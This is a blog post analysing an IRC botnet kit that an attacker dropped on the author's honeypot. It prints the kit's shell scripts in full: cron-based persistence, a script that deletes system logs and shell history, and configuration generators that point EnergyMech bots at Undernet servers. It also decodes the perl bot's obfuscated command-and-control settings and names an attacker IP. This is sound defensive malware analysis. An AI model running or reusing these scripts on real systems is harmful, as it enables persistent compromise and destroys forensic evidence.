Skip navigation

Monthly Archives: November 2012

There are a number of reasons that a hacker/skid might want control of a machine. Compromised hosts serve as an ideal place to launch attacks from, as when properly configured by an attacker (and hopefully not noticed by careless administrators), the bad guy can use this machine for a long time, for file storage, or as a place to launch further malicious attacks.

In a recent attack, I witnessed an attacker dropping multiple files on my machine, both forms of IRC bot software. One of them was a seemingly well known perl script created by Brazilian group, Atrix-Team. Since it’s written in perl rather than one of the standard compiled languages, it’s much easier to others to customise and spread. The second was a .tar full of c source code, a few binaries, and some bash scripts. Nice!

Let’s take a look:

$ ls -l
-rwxrwxr-x 1 ubuntu ubuntu    317 Oct 30  2006 autorun
-rwxrwxr-x 1 ubuntu ubuntu  12210 Aug  4 00:26 b
-rwxrwxr-x 1 ubuntu ubuntu    485 Aug  5 12:07 clear.sh
-rwxrwxr-x 1 ubuntu ubuntu   7768 Aug 26 17:38 inst
-rwxrwxr-x 1 ubuntu ubuntu 397274 Dec  2  2005 kswapd1
-rwxrwxr-x 1 ubuntu ubuntu     34 Aug  5 11:14 run
drwxrwxr-x 2 ubuntu ubuntu   4096 Aug  5 11:55 src
-rwxrwxr-x 1 ubuntu ubuntu    327 Aug  4 12:34 start
-rwxrwxr-x 1 ubuntu ubuntu    169 Aug  5 12:47 update

Fun stuff! I count 8 executable files, and 1 directory. To pick it apart piece by piece:

autorun
$ file autorun
autorun: POSIX shell script, ASCII text executable

#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

This is an interesting script. It appears to add an entry to the cron tab to run update in the current directory. It then creates the update script, and sets it to executable by the current user.

update
$ file update
update: POSIX shell script, ASCII text executable

#!/bin/sh
if test -r /var/spool/.m/m.pid; then
pid=$(cat /var/spool/.m/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /var/spool/.m
./run &>/dev/null

This is the script created by autorun, and configured to trigger automatically via crontab. It checks that .m/.m.pid is readable, and if so, reads the PID from the file, and attempts to kill that process. It exists with value 0 if it succeeds, swaps to the directory where the malicious files are being stored, and executes run.

run
$ file run
run: POSIX shell script, ASCII text executable

#!/bin/sh
export PATH=".";kswapd1

Short but sweet. Exports the current directory to the path, and then executes kswapd1.

Sadly, we’re out of bash script land, now. We’re onto the meat of the matter, the binary itself:

kswapd1
$ file kswapd1
kswapd1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
$ checksums
79217fb606e9b14c3a8d6c399bc74492 md5

First off, the name. kswapd1 is an apparent attempt to survive casual inspection of the process list by mimicking kswapd, the kernel swap daemon responsible for memory management on the system.

We can run the ‘strings’ command on the executable to hopefully get an idea about what we’re getting in to. Inside, we can see a lot of references to IRC commands, and the distinctive word, EnergyMech. EnergyMech is a free/open source IRC bot programmed in c. The feature list is respectable, and seems like a useful feature set for any aspiring botnet owner. This coincides with the contents of the src/ folder we found in the initial .tar file. Also, there are a number of referenced files, presumably generated after the IRC bot is running:

.genuser
./m.
./m.set
./m.ses
./m.help
./m.lev
./m.msg
./m.pid
./r/rquit.e
./r/raway.e
./r/rkicks.e
./r/rversions.e
./r/rpickup.e
./r/rinsult.e
./r/rtsay.e

This is supported by the reappearence of m.pid, which is apparently saved and used to shut down the bot. Since EnergyMech’s feature set is well documented on the site, and the attacker was unsuccessful in configuring it, I won’t waste time further inspecting the binary for now.

clear.sh
$ file clear.sh
clear.sh: Bourne-Again shell script, ASCII text executable, with CRLF line terminators

#!/bin/bash
unset HISTFILE HISTZONE HISTSAVE HISTORY
history -r
history -c
unset WATCH
export HISTFILE=/dev/null
rm -rf /usr/adm/lastlog
rm -rf /var/log/secure*
rm -rf /var/log/lastlog*
rm -rf /var/log/messages*
rm -rf /var/log/auth*
rm -rf /var/log/maillog*
rm -fr /var/log/lfd.log*
touch /var/log/maillog
touch /var/log/lfd.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/lastlog
rm -rf /root/.bash_history
touch /root/.bash_history
./b -u root

A simple bash script to clear all logs, then recreate the files. It then runs b -u root.

b
$ file b
b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped

A quick look at the ‘strings’ output yields several references to log cleaning. Using the poor man’s debugger (google) we identify one of the distinctive strings, ‘didn’t found any parametr to clean (username, hostname, tty)!’ as belonging to WhiteCat, a binary/log cleaner written in c by a member of the Hell Knights Crew.

There are two extra files that don’t seem to have been called so far by the others, inst and start. For the sake of completeness, I will give a breakdown of each.

start
$ file start
start: Bourne-Again shell script, ASCII text executable

#!/bin/bash
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' | grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
D=2
;;
"2")
D=3
;;
"3")
D=4
;;
"4")
D=1
;;
esac
 done < $B
./run
./autorun

The first string of greps retrieves the IP address(es) of the host, and saves them into the file ‘vhosts’. That file is then read line by line, with each IP being passed to inst along with another parameter, the channel. Finally, run and autorun are both called.

inst
$ file inst
inst: Bourne-Again shell script, ISO-8859 text executable

#!/bin/bash
Denominations="gaina
martoaga
martianu
sambatar
....snip....
costel
daniela
lucica
lucia"

ident=($Idents)
num_idents=${#ident[*]}

Realnames="Sato
Suzuki
Takahashi
Tanaka
Watanabe
....snip....
Demers
Gosselin"

denomination=($Denominations)
num_denominations=${#denomination[*]}

echo "SERVER Tampa.FL.US.Undernet.org 6667" >> m.set
echo "SERVER budapest.hu.eu.undernet 6667" >> m.set
echo "SERVER zurich.ch.eu.undernet.org" >> m.set
echo "SERVER lidingo.se.eu.undernet.org 6667" >> m.set
echo "SERVER manchester.uk.eu.undernet.org 6667" >> m.set
echo "SERVER mesa.az.us.undernet.org 6667" >> m.set
echo "SERVER bucharest.ro.eu.undernet.org 6667" >> m.set

echo "ENTITY $2" >> m.set

echo "### BOT 1 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2" >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "### BOT 2 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user2" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2 " >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "handle  z " >> $2.user
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user

echo "prot  4" >> $2.user
echo "channel   * " >> $2.user
echo "access  100 " >> $2.user

echo "handle  z " >> $2.user2
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user2
echo "prot  4" >> $2.user2
echo "channel   * " >> $2.user2
echo "access  100 " >> $2.user2

This file appears to be generating the configuration for the EnergyMech bots, as well as individual user files. It takes two inputs, $1 and $2, from ./start. $1 is the channel to join, and #2 appears to be the IP address of the user. A random nick is selected from the list in the script, which seemed to be a mix of actual names, and random words.

Fortunately, from the kippo log, the attacker kindly showed us exactly what channel he was trying to use. Unfortunately, if it’s hosted on a public server, it’s going to be very resilient. I hopped onto a VPN, and into the IRC to have a look around. There were 21 users, including 2 operators, 1 of whom was an undernet service. The other had a cloaked hostname. Of the rest, 4 had undernet cloaked hostnames, and the remainder did not. A small botnet, if my suspicions are correct, and unlikely to grow fast if the operators are manually installing the bots on compromised hosts.

Thanks for stopping by, @DINAMO of #raul, connecting to the honeypot from 87.219.142.165 on Oct 26th. It’s always fun to have ‘live ammunition’ to play with.

Bonus Round

The perl script was downloaded from hxxp://dearlifefuckyou.com/xaoc/max.txt, and the homepage of dearlifefuckyou.com is blanked out except for an advert and the text “// xaoc was here”. The config of the perl script was as follows:

my $section=chr(120) . chr(46) . chr(115) . chr(105) . chr(116) . chr(104) . chr(110) . chr(101) . chr(116) . chr(46) . chr(111) . chr(114) . chr(103);
my $porta=chr(49) . chr(49) . chr(50) . chr(49) . chr(49);
my @interval=chr(35) . chr(46) . chr(106);
my @location=chr(120) . chr(88) . chr(120);
my $mapp=chr(115) . chr(117) . chr(110);
push(@location,$mapp);

While this is top end obfuscation, I think we can crack it.

my $section=x.sithnet.org;
my $porta=11211;
my @interval=#.j;
my @location=xXx;
my $mapp=sun;
push(@location,$mapp);

While it is not currently up, sithnet.org resolves to 212.199.115.203, which has also gone by terahost.tv and has a history of bad behaviour.

Advertisements